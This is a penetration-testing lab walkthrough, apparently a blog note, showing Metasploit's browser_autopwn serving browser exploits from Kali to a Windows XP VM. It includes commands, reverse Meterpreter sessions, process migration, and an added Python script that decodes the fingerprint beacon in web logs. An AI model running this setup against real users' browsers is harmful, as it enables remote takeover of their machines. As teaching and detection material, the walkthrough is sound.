Browser penetration testing, using a browser autopwn attack as the example
I. The browser autopwn attack
Principle
II. Lab environment
Attacking machine (server): Kali 2019.3
Target machine (victim): Windows XP
III. Lab steps
1. Operations on Kali
msf5 > use auxiliary/server/browser_autopwn
msf5 auxiliary(server/browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

msf5 auxiliary(server/browser_autopwn) > set srvhost 10.10.10.155
srvhost => 10.10.10.155
msf5 auxiliary(server/browser_autopwn) > set lhost 10.10.10.155
lhost => 10.10.10.155
msf5 auxiliary(server/browser_autopwn) > set URIPATH /
URIPATH => /
msf5 auxiliary(server/browser_autopwn) > exploit
[*] Auxiliary module running as background job 0.
[*] Setup
msf5 auxiliary(server/browser_autopwn) >
[*] Starting exploit modules on host 10.10.10.155...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/qOnCM
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.155:8080/LKtM
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.155:8080/Plrmb
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.155:8080/OLrJlXl
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/DGMKpkzgl
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/vxSkgPKnuw
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/qFeUdwupePC
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/IglhJsmnNeL
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/QVlrRXkqoDlY
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/mAcrliKw
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.155:8080/IgQvQD
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/kSfNK
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/mwwNxNpLenMHX
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/qgSKzGkMm
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/oUBVvezFfKcd
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/DMZgEQHCUT
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/iTUVRf
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/cGsnYd
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.155:8080/eCSchQ
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 10.10.10.155:3333
[*] Using URL: http://10.10.10.155:8080/UOaOFkJ
[*] Server started.
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 10.10.10.155:6666
[*] Started reverse TCP handler on 10.10.10.155:7777
[*] --- Done, found 20 exploit modules
[*] Using URL: http://10.10.10.155:8080/
[*] Server started.
2. The victim visits the server
Using IE on the Windows XP machine, visit http://10.10.10.155:8080/
3. Result on Kali
[*] Handling '/'
[*] Handling '/?sessid=V2luZG93cyBYUDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDpTUDI6emgtY246eDg2Ok1TSUU6Ni4wOg%3d%3d'
[*] JavaScript Report: Windows XP:undefined:undefined:undefined:SP2:zh-cn:x86:MSIE:6.0:
[*] Responding with 14 exploits
[*] 10.10.10.132 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 10.10.10.132 java_atomicreferencearray - Generated jar to drop (5304 bytes).
[*] 10.10.10.132 java_jre17_jmxbean - handling request for /vxSkgPKnuw
[*] 10.10.10.132 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
…………
[*] Sending stage (179779 bytes) to 10.10.10.132
[*] 10.10.10.132 java_jre17_provider_skeleton - handling request for /qFeUdwupePC
[*] 10.10.10.132 java_jre17_reflection_types - handling request for /IglhJsmnNeL/
[*] 10.10.10.132 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 10.10.10.132 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 10.10.10.132 java_verifier_field_access - Generated jar to drop (5304 bytes).
[*] 10.10.10.132 java_jre17_provider_skeleton - handling request for /qFeUdwupePC/
[*] Meterpreter session 1 opened (10.10.10.155:3333 -> 10.10.10.132:1203) at 2021-10-06 03:33:53 -0400
[*] Sending stage (179779 bytes) to 10.10.10.132
[*] Meterpreter session 2 opened (10.10.10.155:3333 -> 10.10.10.132:1204) at 2021-10-06 03:34:09 -0400
[*] Session ID 1 (10.10.10.155:3333 -> 10.10.10.132:1203) processing InitialAutoRunScript 'migrate -f'
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
[*] Current server process: FTTwbkTSNceYy.exe (3724)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 968
[*] Session ID 2 (10.10.10.155:3333 -> 10.10.10.132:1204) processing InitialAutoRunScript 'migrate -f'
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
[*] Current server process: unZbEFCawVoIclyNztFCwJ.exe (3732)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1024
[+] Successfully migrated to process
msf5 auxiliary(server/browser_autopwn) > sessions -i

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x86/windows  WINXP-Z9M8R8-1\z9m8r8 @ WINXP-Z9M8R8-1  10.10.10.155:3333 -> 10.10.10.132:1203 (10.10.10.132)
  2         meterpreter x86/windows  WINXP-Z9M8R8-1\z9m8r8 @ WINXP-Z9M8R8-1  10.10.10.155:3333 -> 10.10.10.132:1204 (10.10.10.132)

msf5 auxiliary(server/browser_autopwn) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                   Path
 ---   ----  ----               ----  -------  ----                   ----
 0     0     [System Process]
 4     0     System             x86   0        NT AUTHORITY\SYSTEM
 188   664   VGAuthService.exe  x86   0        NT AUTHORITY\SYSTEM    C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 192   1484  conime.exe         x86   0        WINXP-Z9M8R8-1\z9m8r8  C:\WINDOWS\system32\conime.exe
 808   1508  pythonw.exe        x86   0        WINXP-Z9M8R8-1\z9m8r8  C:\Python27\pythonw.exe
 1508  1484  explorer.exe       x86   0        WINXP-Z9M8R8-1\z9m8r8  C:\WINDOWS\Explorer.EXE
…………

meterpreter > migrate 1508
[*] Migrating from 1024 to 1508...
[*] Migration completed successfully.
meterpreter >
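The `/?sessid=...` request in the output above is the browser's JavaScript fingerprint, base64-encoded and then percent-encoded, which the server turns into the "JavaScript Report" line. As an added example (not code from the original post or from Metasploit), the following Python script scans constructed web-server access-log lines for such fingerprint beacons and decodes them, which is how a defender can spot this stage in proxy or web logs; the field labels are my assumption from the order of the observed report.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (Common Log Format), not taken from the page;
# the first two mirror the '/' and '/?sessid=...' requests the lab shows.
SAMPLE_LOG = """\
10.10.10.132 - - [06/Oct/2021:03:33:40 -0400] "GET / HTTP/1.1" 200 1423
10.10.10.132 - - [06/Oct/2021:03:33:41 -0400] "GET /?sessid=V2luZG93cyBYUDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDpTUDI6emgtY246eDg2Ok1TSUU6Ni4wOg%3d%3d HTTP/1.1" 200 9812
10.10.10.7 - - [06/Oct/2021:03:35:02 -0400] "GET /index.html?sessid=abc123 HTTP/1.1" 200 512
10.10.10.9 - - [06/Oct/2021:03:36:11 -0400] "GET /login?user=bob HTTP/1.1" 302 0
"""

# Field labels are my assumption from the order of the observed report
# "Windows XP:undefined:undefined:undefined:SP2:zh-cn:x86:MSIE:6.0:";
# the "undefined" entries are JavaScript's undefined rendered as text.
FIELDS = ("os_name", "os_vendor", "os_flavor", "os_device", "os_sp",
          "os_lang", "arch", "ua_name", "ua_ver")

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*"')

def decode_sessid(raw):
    """Decode one percent-encoded sessid value into a fingerprint dict, else None."""
    try:
        text = base64.b64decode(unquote(raw), validate=True).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
        return None
    parts = text.split(":")
    # nine values plus the empty string left by the trailing colon
    if len(parts) != len(FIELDS) + 1 or parts[-1] != "":
        return None
    return dict(zip(FIELDS, parts))

def find_fingerprint_beacons(log_text):
    """Return one record per request whose sessid decodes to a fingerprint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # split the query by hand: parse_qs would turn base64 '+' into spaces
        for pair in urlsplit(m.group("target")).query.split("&"):
            key, sep, raw = pair.partition("=")
            fp = decode_sessid(raw) if sep and key == "sessid" else None
            if fp is not None:
                hits.append({"src": m.group("src"), "ts": m.group("ts"),
                             "target": m.group("target"), "fingerprint": fp})
    return hits
```

Running `find_fingerprint_beacons(SAMPLE_LOG)` on the constructed lines yields exactly one record, the Windows XP / MSIE 6.0 beacon from 10.10.10.132; the `sessid=abc123` line is rejected because it is not valid base64 of a nine-field report.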
4. Post-exploitation
Privilege escalation, backdoor deployment, covering tracks and so on are not demonstrated here; see the other notes in this series.
IV. References
《精通Metasploit渗透测试》 (Mastering Metasploit)
Stay true to the original aspiration, and you will reach the end.